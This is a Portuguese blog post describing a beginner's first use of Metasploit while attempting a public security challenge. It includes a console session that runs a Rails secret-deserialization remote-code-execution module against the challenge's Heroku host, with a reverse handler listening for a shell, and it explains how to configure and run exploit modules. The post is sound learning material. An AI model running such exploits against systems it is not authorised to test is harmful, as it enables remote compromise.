[Small Bite] Brincando com Metasploit

2014 August 27, 14:03 h - tags: metasploit security

Ontem o @joernchen mandou um pequeno desafio básico de segurança pra comunidade. Ele postou um código de uma pequena aplicação, colocou ela no ar, e nos desafiou a resetar a senha do administrador.

Confesso que demorei mais do que gostaria mas no fim eu consegui - e foi simples (post sobre isso vem depois).

No caminho eu acabei explorando o Metasploit, provavelmente um dos melhores e mais conhecidos pacotes de testes de penetração de segurança. E alguns não sabem disso mas ele não só é código-aberto (existem ferramentas e serviços pagos) como é uma aplicação Rails! Então vale muito a pena acompanhar esse projeto.

O @joernchen já contribuiu no código do Metasploit incluindo o famigerado exploit para Remote Code Execution no Rails (calma, as versões novas já não tem mais isso!)

Instalar o Metasploit no seu sistema é simples. Este blog post descreve como. Ele começa falando para baixar um script que faz tudo mas, se você usa RVM ou RBenv ou não usa Ubuntu, faça na mão, é mais simples. Não vou repetir o que já está no post então acompanhe lá.

No final, você deve ter o metasploit instalado e com o comando msfconsole a partir de onde já dá pra começar a brincar. Por exemplo, uma das coisas que eu tentei ver foi se o aplicativo do desafio sofria o problema de remote code execution que mencionei acima, pra isso, uma vez dentro do console eu fiz:

1
2
3
4
5
6
7
8
9
10
msf exploit(rails_json_yaml_code_exec) > use exploit/multi/http/rails_secret_deserialization
msf exploit(rails_secret_deserialization) > set RHOST getthisadmin.herokuapp.com
msf exploit(rails_secret_deserialization) > set TARGETURI /reset/_csrf_token
msf exploit(rails_secret_deserialization) > run
[*] Started reverse handler on 192.168.47.172:4444
[*] Checking for cookie _csrf_token
[!] Caution: Cookie not found, maybe you need to adjust TARGETURI
[*] Trying to leverage default controller without cookie confirmation.
[*] Sending cookie _csrf_token
msf exploit(rails_secret_deserialization) > exit

E podemos ver que o problema não é esse. No Metasploit você carrega um dos muitos módulos de exploit que quer explorar (veja lista no próprio código fonte). Cada exploit tem várias opções pra configurar (execute show options para mostrar as configurações). Use o comando set para configurar com o site que quer explorar. Finalmente, rode com run para executar e ver se tem o exploit ou não.

Eu mesmo não sou um expert em segurança mas conheço o básico e explorar o Metasploit pode ser uma excelente fonte para você entender como funcionam exploits de segurança. O código de cada módulo é em Ruby e é muito fácil de ler.

E já descobriram o desafio do @joernchen? Neste post eu já dei uma grande dica ;-) Comentem se conseguiram, mas não dêem a resposta ainda pra todo mundo poder testar.

Comments

comentários deste blog disponibilizados por Disqus